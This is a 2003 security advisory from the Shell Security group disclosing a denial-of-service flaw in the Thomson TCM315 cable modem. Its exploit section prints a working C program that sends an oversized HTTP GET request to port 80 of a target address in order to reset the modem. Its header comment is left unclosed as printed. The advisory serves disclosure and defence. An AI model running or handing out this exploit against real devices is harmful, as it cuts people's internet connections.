. : Shell Security Advisory : .
Subject: Buffer overflow in the cable modem Thomson TCM315
Issue date: 2003 November 23
Related link: http://www.shellsec.net/leer_advisory.php?id=2
Homepage: http://www.shellsec.net
Info about product: http://www.qb.ro/docs/tcm315.pdf
[ - 1 - Introduction ] ----------------------------
Software description:
Thomson TCM315 cable modem
- DOCSIS 1.0 certified
- DOCSIS 2.0 ready and DOCSIS 1.1 compliant
- NAT/PAT/Firewall and integrated router for SOHO installations (in a separate software release)
- Bridging between the USB and Ethernet port
- Easy Access to Advanced Diagnostics Web Pages
- USB port for easy installation
- Reliable high-performance platform
- Surf the Internet Up to 100 Times Faster than a 56k analog Modem
- Internet On-Off button for enhanced security
[ - 2 - Problem description ] ----------------------------------------
The problem appears by sending an HTTP request with a long string to the cable modem, causing a deny of service (DoS). Example:
[ - 3 - How to exploit it ] ----------------------------------
To test this vulnerability, we used the next code. Note: the code is written in C to be used in Windows systems, but it's easily portable to Unix systems.
--------------------- CUT HERE ---------------------
/* ADVISORY - Thomson Cablemodem TCM315 Denial of Service
Shell security group (2003) http://www.shellsec.net
November 10 of 2003
Tested against: TCM315 MP
Software Version: ST31.04.00
Software Model: A801
Bootloader: 2.1.4c
Impact: Users with access to the network can remotely shutdown internet connection.
Discovered by: aT4r Andres[at]shellsec.net Vendor: contacted (no answer) Fix: no yet
usage: just, thdos.exe
#include <stdio.h> #include <winsock2.h>
void main(int argc,char *argv[]) { char evil[150],buffer[1000]; struct sockaddr_in shellsec; int fd; WSADATA ws;
WSAStartup( MAKEWORD(1,1), &( ws) );
shellsec.sin_family = AF_INET; shellsec.sin_port = htons(80); shellsec.sin_addr.s_addr = inet_addr(argv[1]);
memset(evil,'\0',sizeof(evil)); memset(evil,'A',100); sprintf(buffer,"GET /%s HTTP/1.1\r\n\r\n\r\n",evil);
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (connect(fd,( struct sockaddr *)&shellsec,sizeof(shellsec)) != -1) { send(fd,buffer,strlen(buffer),0); printf("done. Thomson Cablemodem reset!\n"); sleep(100); } else printf("Unable to connect to CM.\n"); }
--------------------- CUT HERE ---------------------
[ - 4 - Solution ] -----------------------
Thomson was advised about this vulnerability, but we got no answer, so as we know there is no patch to fix this issue.. As a possible solution, you can filter requests made to the cable modem.
[ - 5 - Credits ] ---------------------
Autor: Andrés Tarascó ( andres[at]shellsec.net ) Redactor: Fernando Ortega ( fernando[at]shellsec.net ) Issue date: 23 de Noviembre de 2003 Url: http://www.shellsec.net
Administrador de Shell Security (admin[at]shellsec.net)
Shell Security Group (http://www.shellsec.net)